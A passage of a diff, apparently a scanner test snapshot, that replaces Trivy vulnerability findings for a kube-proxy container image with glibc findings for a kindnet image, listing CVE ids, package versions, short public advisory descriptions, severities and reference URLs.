"https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lore.kernel.org/patchwork/patch/793178/", - "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", - "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "https://access.redhat.com/security/cve/CVE-2021-35942", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "https://linux.oracle.com/cve/CVE-2021-35942.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "https://security.gentoo.org/glsa/202208-24", + "https://security.netapp.com/advisory/ntap-20210827-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-35942", ], }, "category": "Vulnerability", - "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "name": "glibc: Arbitrary read in wordexp()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + "value": "https://avd.aquasec.com/nvd/cve-2021-35942", }, { "type": "URL", - "value": "http://seclists.org/oss-sec/2016/q1/452", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "value": "https://access.redhat.com/security/cve/CVE-2021-35942", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lore.kernel.org/patchwork/patch/793178/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-18018", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", - "references": [ - "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", - "https://access.redhat.com/security/cve/CVE-2017-18018", - "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", - "https://www.cve.org/CVERecord?id=CVE-2017-18018", - ], - }, - "category": "Vulnerability", - "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "coreutils: race condition vulnerability in chown and chgrp", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-18018", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", }, { "type": "URL", - "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-18018", + "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "value": "https://ubuntu.com/security/notices/USN-5699-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.20.10", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1664", - "installedVersion": "1.20.9", - "packageName": "dpkg", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23218", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", - "https://lists.debian.org/debian-security-announce/2022/msg00115.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", - "https://security.netapp.com/advisory/ntap-20221007-0002/", - "https://ubuntu.com/security/notices/USN-5446-1", - "https://ubuntu.com/security/notices/USN-5446-2", + "https://access.redhat.com/security/cve/CVE-2022-23218", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "https://linux.oracle.com/cve/CVE-2022-23218.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", + "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1664", + "value": "https://avd.aquasec.com/nvd/cve-2022-23218", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "value": "https://access.redhat.com/security/cve/CVE-2022-23218", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", }, { "type": "URL", - "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-1", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.2.27-2+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-34903", - "installedVersion": "2.2.27-2+deb11u1", - "packageName": "gpgv", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23219", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "http://www.openwall.com/lists/oss-security/2022/07/02/1", - "https://access.redhat.com/errata/RHSA-2022:6602", - "https://access.redhat.com/security/cve/CVE-2022-34903", - "https://bugs.debian.org/1014157", - "https://bugzilla.redhat.com/2102868", - "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", - "https://dev.gnupg.org/T6027", - "https://errata.almalinux.org/9/ALSA-2022-6602.html", - "https://errata.rockylinux.org/RLSA-2022:6602", - "https://linux.oracle.com/cve/CVE-2022-34903.html", - "https://linux.oracle.com/errata/ELSA-2022-6602.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", - "https://security.netapp.com/advisory/ntap-20220826-0005/", - "https://ubuntu.com/security/notices/USN-5503-1", - "https://ubuntu.com/security/notices/USN-5503-2", - "https://www.cve.org/CVERecord?id=CVE-2022-34903", - "https://www.debian.org/security/2022/dsa-5174", - "https://www.openwall.com/lists/oss-security/2022/06/30/1", + "https://access.redhat.com/security/cve/CVE-2022-23219", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "https://linux.oracle.com/cve/CVE-2022-23219.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Signature spoofing via status line injection", + "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-34903", + "value": "https://avd.aquasec.com/nvd/cve-2022-23219", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "value": "https://access.redhat.com/security/cve/CVE-2022-23219", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6602", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-34903", + "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", }, { "type": "URL", - "value": "https://bugs.debian.org/1014157", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2102868", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://dev.gnupg.org/T6027", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6602", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1751", + "installedVersion": "2.28-10", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-1751", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "https://linux.oracle.com/cve/CVE-2020-1751.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200430-0002/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1751", + ], + }, + "category": "Vulnerability", + "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: array overflow in backtrace functions for powerpc", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "value": "https://avd.aquasec.com/nvd/cve-2020-1751", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "value": "https://access.redhat.com/security/cve/CVE-2020-1751", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-2", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5174", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", + "value": "https://ubuntu.com/security/notices/USN-4416-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4416-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3219", - "installedVersion": "2.2.27-2+deb11u1", - "packageName": "gpgv", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1752", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-3219", - "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", - "https://dev.gnupg.org/D556", - "https://dev.gnupg.org/T5993", - "https://marc.info/?l=oss-security&m=165696590211434&w=4", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", - "https://security.netapp.com/advisory/ntap-20230324-0001/", - "https://www.cve.org/CVERecord?id=CVE-2022-3219", + "https://access.redhat.com/security/cve/CVE-2020-1752", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "https://linux.oracle.com/cve/CVE-2020-1752.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "https://security.gentoo.org/glsa/202101-20", + "https://security.netapp.com/advisory/ntap-20200511-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1752", ], }, "category": "Vulnerability", - "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "denial of service issue (resource consumption) using compressed packets", + "name": "glibc: use-after-free in glob() function when expanding ~user", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3219", + "value": "https://avd.aquasec.com/nvd/cve-2020-1752", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3219", + "value": "https://access.redhat.com/security/cve/CVE-2020-1752", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", }, { "type": "URL", - "value": "https://dev.gnupg.org/D556", + "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5993", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.10-4+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "1.10-4", - "packageName": "gzip", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", - ], - }, - "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", + "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-6096", + "installedVersion": "2.28-10", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-6096", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://ubuntu.com/security/notices/USN-4954-1", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + ], + }, + "category": "Vulnerability", + "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", + "references": [ { "type": "URL", - 